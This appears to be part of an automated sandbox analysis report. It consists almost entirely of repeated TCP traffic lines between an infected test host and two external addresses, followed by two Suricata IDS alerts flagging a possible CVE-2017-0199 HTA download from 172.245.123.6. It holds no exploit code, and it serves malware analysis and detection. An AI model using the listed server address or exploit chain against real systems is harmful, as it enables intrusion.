            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 172.245.123.6:80
            Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.245.123.6:80
